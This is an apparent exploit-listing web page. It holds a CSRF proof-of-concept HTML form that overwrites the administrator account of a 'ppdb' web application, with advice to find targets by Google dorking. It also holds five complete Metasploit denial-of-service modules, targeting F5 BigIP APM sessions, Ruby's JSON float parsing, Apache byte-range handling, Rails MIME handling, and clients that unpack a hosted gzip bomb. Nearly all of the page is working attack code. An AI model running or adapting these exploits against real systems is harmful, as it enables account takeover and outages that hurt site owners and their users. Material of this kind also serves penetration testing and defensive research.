Latest exploits :: CodePwn

<pre><code>============================================================================================================================================= | # Title : ppdb v2.4-update 6118-1 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://drive.usercontent.google.com/download?id=1gnVS8xLA-884e7M8V5dc3_i9qNgrviVq&export=download&authuser=0 | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following HTML code modifies the admin information. [+] Go to the line 10. Set the target website link Save changes and apply . [+] infected file : /root/psb-user-update.php. [+] save code as poc.html [+] payload : <div class="col-lg-6"> <h2 class="page-header">Administrator</h2> <div class="panel panel-default"> <div class="panel-heading"> User Profile </div>  <div class="panel-body"> <div class="table-responsive"> <form role="form" method="post" action="http://127.0.0.1/ppdb/root/psb-user-update.php" enctype="multipart/form-data"> <table class="table table-striped table-bordered table-hover"> <tbody> <tr> <td>Username</td> <td><input class="form-control" type="text" name="username" value="indoushka" required=""> <input class="form-control" type="hidden" name="id" value="1"></td> </tr> <tr> <td>Password</td> <td><input class="form-control" type="password" name="password" id="password" required=""></td> </tr> <tr> <td>Nama</td> <td><input class="form-control" type="nama" name="nama" id="nama" value="nekkaa salah eddine" required=""></td> </tr> <tr> <td>Email</td> <td><input class="form-control" type="text" name="email" value="indoushka4ever@gmail.com" required=""> <input type="hidden" name="level" id="level" value="1"> </td> </tr> <tr> <td colspan="3"><input type="file" name="foto" id="foto" required=""></td> </tr> </tbody> </table> <button type="submit" class="btn btn-primary" name="update" id="update">Update</button> </form> </div>  </div>  </div>  </div> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'F5 BigIP Access Policy Manager Session Exhaustion Denial of Service', 'Description' => %q{ This module exploits a resource exhaustion denial of service in F5 BigIP devices. An unauthenticated attacker can establish multiple connections with BigIP Access Policy Manager (APM) and exhaust all available sessions defined in customer license. In the first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP system creates a session, marks it as pending and then redirects the client to an access policy URI. Since BigIP allocates a new session after the first unauthenticated request, and deletes the session only if an access policy timeout expires, the attacker can exhaust all available sessions by repeatedly sending the initial HTTP request and leaving the sessions as pending. }, 'Author' => [ 'Denis Kolegov <dnkolegov[at]gmail.com>', 'Oleg Broslavsky <ovbroslavsky[at]gmail.com>', 'Nikita Oleksov <neoleksov[at]gmail.com>' ], 'References' => [ ['URL', 'https://support.f5.com/kb/en-us/products/big-ip_apm/releasenotes/product/relnote-apm-11-6-0.html'] ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 } )) register_options( [ OptInt.new('RLIMIT', [true, 'The number of requests to send', 10000]), OptBool.new('FORCE', [true, 'Proceed with attack even if a BigIP virtual server isn\'t detected', false]) ]) end def run limit = datastore['RLIMIT'] force_attack = datastore['FORCE'] res = send_request_cgi('method' => 'GET', 'uri' => '/') unless res print_error("No answer from the BigIP server") return end # Simple test based on HTTP Server header to detect BigIP virtual server server = res.headers['Server'] unless server =~ /BIG\-IP/ || server =~ /BigIP/ || force_attack print_error("BigIP virtual server was not detected. Please check options") return end print_status("Starting DoS attack") # Start attack limit.times do |step| if step % 100 == 0 print_status("#{step * 100 / limit}% accomplished...") end res = send_request_cgi('method' => 'GET', 'uri' => '/') if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/ print_good("DoS accomplished: The maximum number of concurrent user sessions has been reached.") return end end # Check if attack has failed res = send_request_cgi('method' => 'GET', 'uri' => uri) if res.headers['Location'] =~ /\/my.policy/ print_error("DoS attack failed. Try to increase the RLIMIT") else print_status("Result is undefined. Try to manually determine DoS attack result") end rescue ::Errno::ECONNRESET print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached") rescue ::Rex::ConnectionRefused print_error("Unable to connect to BigIP") rescue ::Rex::ConnectionTimeout print_error("Unable to connect to BigIP. Please check options") rescue ::OpenSSL::SSL::SSLError print_error("SSL/TLS connection error") end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails JSON Processor Floating Point Heap Overflow DoS', 'Description' => %q{ When Ruby attempts to convert a string representation of a large floating point decimal number to its floating point equivalent, a heap-based buffer overflow can be triggered. This module has been tested successfully on a Ruby on Rails application using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application crashes with a segfault error. Other versions of Ruby are reported to be affected. }, 'Author' => [ 'Charlie Somerville', # original discoverer 'joev', # bash PoC 'todb', # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-4164' ], [ 'OSVDB', '100113' ], [ 'URL', 'https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/' ] ], 'DisclosureDate' => '2013-11-22')) register_options( [ OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/']), OptString.new('HTTPVERB', [false, 'The HTTP verb to use', 'POST']) ]) end def uri normalize_uri(target_uri.path.to_s) end def verb datastore['HTTPVERB'] || 'POST' end def digit_pattern @digit_pattern ||= rand(10_000).to_s end def integer_part digit_pattern end def multiplier (500_000 * (1.0/digit_pattern.size)).to_i end def fractional_part digit_pattern * multiplier end # The evil_float seems to require some repeating element. Maybe # it's just superstition, but straight up 300_002-lenth random # numbers don't appear to trigger the vulnerability. Also, these are # easier to produce, and slightly better than the static "1.1111..." # for 300,000 decimal places. def evil_float_string [integer_part,fractional_part].join('.') end def run print_status "Using digit pattern of #{digit_pattern} taken to #{multiplier} places" sploit = '[' sploit << evil_float_string sploit << ']' print_status "Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}" target_available = true begin res = send_request_cgi( { 'method' => verb, 'uri' => uri, 'ctype' => "application/json", 'data' => sploit }) rescue ::Rex::ConnectionRefused print_error "Unable to connect. (Connection refused)" target_available = false rescue ::Rex::HostUnreachable print_error "Unable to connect. (Host unreachable)" target_available = false rescue ::Rex::ConnectionTimeout print_error "Unable to connect. (Timeout)" target_available = false end return unless target_available print_status "Checking availability" begin res = send_request_cgi({ 'method' => verb, 'uri' => uri, 'ctype' => "application/json", 'data' => Rex::Text.rand_text_alpha(1+rand(64)).to_json }) if res and res.body and res.body.size > 0 target_available = true else print_good "#{peer}#{uri} - DoS appears successful (No useful response from host)" target_available = false end rescue ::Rex::ConnectionError, Errno::ECONNRESET print_good "DoS appears successful (Host unreachable)" target_available = false end return unless target_available print_error "Target is still responsive, DoS was unsuccessful." end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'Apache Range Header DoS (Apache Killer)', 'Description' => %q{ The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, exploit called "Apache Killer" }, 'Author' => [ 'Kingcope', #original discoverer 'Masashi Fujiwara', #metasploit module 'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability ], 'License' => MSF_LICENSE, 'Actions' => [ ['DOS', 'Description' => 'Trigger Denial of Service against target'], ['CHECK', 'Description' => 'Check if target is vulnerable'] ], 'DefaultAction' => 'DOS', 'References' => [ [ 'BID', '49303'], [ 'CVE', '2011-3192'], [ 'EDB', '17696'], [ 'OSVDB', '74721' ], ], 'DisclosureDate' => '2011-08-19' )) register_options( [ Opt::RPORT(80), OptString.new('URI', [ true, "The request URI", '/']), OptInt.new('RLIMIT', [ true, "Number of requests to send",50]) ]) end def run_host(ip) case action.name when 'DOS' conduct_dos() when 'CHECK' check_for_dos() end end def check_for_dos() uri = datastore['URI'] rhost = datastore['RHOST'] begin res = send_request_cgi({ 'uri' => uri, 'method' => 'HEAD', 'headers' => { "HOST" => rhost, "Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10", "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10" } }) if (res and res.code == 206) print_status("Response was #{res.code}") print_status("Found Byte-Range Header DOS at #{uri}") report_note( :host => rhost, :port => rport, :type => 'apache.killer', :data => "Apache Byte-Range DOS at #{uri}" ) else print_status("#{rhost} doesn't seem to be vulnerable at #{uri}") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end end def conduct_dos() uri = datastore['URI'] rhost = datastore['RHOST'] ranges = '' for i in (0..1299) do ranges += ",5-" + i.to_s end for x in 1..datastore['RLIMIT'] begin print_status("Sending DoS packet #{x} to #{rhost}:#{rport}") res = send_request_cgi({ 'uri' => uri, 'method' => 'HEAD', 'headers' => { "HOST" => rhost, "Range" => "bytes=0-#{ranges}", "Request-Range" => "bytes=0-#{ranges}"}},1) rescue ::Rex::ConnectionRefused print_error("Unable to connect to #{rhost}:#{rport}") rescue ::Errno::ECONNRESET print_good("DoS packet successful. #{rhost} not responding.") rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_error("Couldn't connect to #{rhost}:#{rport}") rescue ::Timeout::Error, ::Errno::EPIPE end end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails Action View MIME Memory Exhaustion', 'Description' => %q{ This module exploits a Denial of Service (DoS) condition in Action View that requires a controller action. By sending a specially crafted content-type header to a Rails application, it is possible for it to store the invalid MIME type, and may eventually consume all memory if enough invalid MIMEs are given. Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16. }, 'Author' => [ 'Toby Hsieh', # Reported the issue 'joev', # Metasploit 'sinn3r' # Metasploit ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-6414' ], [ 'OSVDB', '100525' ], [ 'BID', '64074' ], [ 'URL', 'https://seclists.org/oss-sec/2013/q4/400' ], [ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ] ], 'DisclosureDate' => '2013-12-04')) register_options( [ Opt::RPORT(80), OptString.new('URIPATH', [true, 'The URI that routes to a Rails controller action', '/']), OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 60000]), OptInt.new('REQCOUNT', [true, 'Number of HTTP requests to pipeline per connection', 1]), OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000]) ], self.class) end def host host = datastore['RHOST'] host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80 host end def long_string Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE']) end # # Returns a modified version of the URI that: # 1. Always has a starting slash # 2. Removes all the double slashes # def normalize_uri(*strs) new_str = strs * "/" new_str = new_str.gsub!("//", "/") while new_str.index("//") # Makes sure there's a starting slash unless new_str.start_with?("/") new_str = '/' + new_str end new_str end def http_request uri = normalize_uri(datastore['URIPATH']) http = '' http << "GET #{uri} HTTP/1.1\r\n" http << "Host: #{host}\r\n" http << "Accept: #{long_string}\r\n" http << "\r\n" http end def run begin print_status("Stressing the target memory, this will take quite some time...") datastore['RLIMIT'].times { |i| connect datastore['REQCOUNT'].times { sock.put(http_request) } disconnect } print_status("Attack finished. Either the server isn't vulnerable, or please dos harder.") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_status("Unable to connect to #{host}.") rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached.") ensure disconnect end end end =begin Reproduce: 1. Add a def index; end to ApplicationController 2. Add an empty index.html.erb file to app/views/application/index.html.erb 3. Uncomment the last line in routes.rb 4. Hit /application =end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'zlib' require 'stringio' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Gzip Memory Bomb Denial Of Service', 'Description' => %q{ This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB. Many applications will not implement a length limit check and will eat up all memory and eventually die. This can also be used to kill systems that download/parse content from a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc). A FILEPATH datastore option can also be provided to save the .gz bomb locally. Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value) will generate a 300 byte gzipped file that expands to 10GB. }, 'Author' => [ 'info[at]aerasec.de', # 2004 gzip bomb advisory 'joev' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html' ] ], 'DisclosureDate' => '2004-01-01', 'Actions' => [ [ 'WebServer', 'Description' => 'Host file via web server' ] ], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction' => 'WebServer')) register_options( [ OptInt.new('SIZE', [true, 'Size of uncompressed data in megabytes (10GB default).', 10240]), OptInt.new('ROUNDS', [true, 'Rounds of gzip compression. Some applications (FF) support > 1.', 1]), OptString.new('URIPATH', [false, 'Path of URI on server to the gzip bomb (default is random)']), OptString.new('CONTENT_TYPE', [false, 'Content-Type header to serve in the response', 'text/html']) ], self.class) end def run datastore['HTTP::compression'] = false # not a good idea @gzip = generate_gzip print_status "Gzip generated. Uncompressed=#{default_size}bytes. Compressed=#{@gzip.length}bytes." exploit # start http server end def on_request_uri(cli, request) print_status "Sending gzipped payload to client #{cli.peerhost}" rounds = (['gzip']*datastore['ROUNDS']).join(', ') send_response(cli, @gzip, { 'Content-Encoding' => rounds, 'Content-Type' => datastore['CONTENT_TYPE'] }) end # zlib ftw def generate_gzip(size=default_size, blocks=nil, reps=nil) reps ||= datastore['ROUNDS'] return blocks if reps < 1 print_status "Generating gzip bomb..." StringIO.open do |io| stream = Zlib::GzipWriter.new(io, Zlib::BEST_COMPRESSION, Zlib::DEFAULT_STRATEGY) buf = nil begin # add MB of data to the stream. this takes a little while, but doesn't kill memory. if blocks.nil? chunklen = 1024*1024*8 # 8mb per chunk a = "A"*chunklen n = size / chunklen n.times do |i| stream << a if i % 100 == 0 print_status "#{i.to_s.rjust(Math.log(n,10).ceil)}/#{n} chunks added (#{'%.1f' % (i.to_f/n.to_f*100)}%)" end end else stream << blocks end a = nil # gc a buf = generate_gzip(size, io.string, reps-1) ensure stream.flush stream.close end buf end end def default_size datastore['SIZE']*1024*1024 # mb -> bytes end end </code></pre>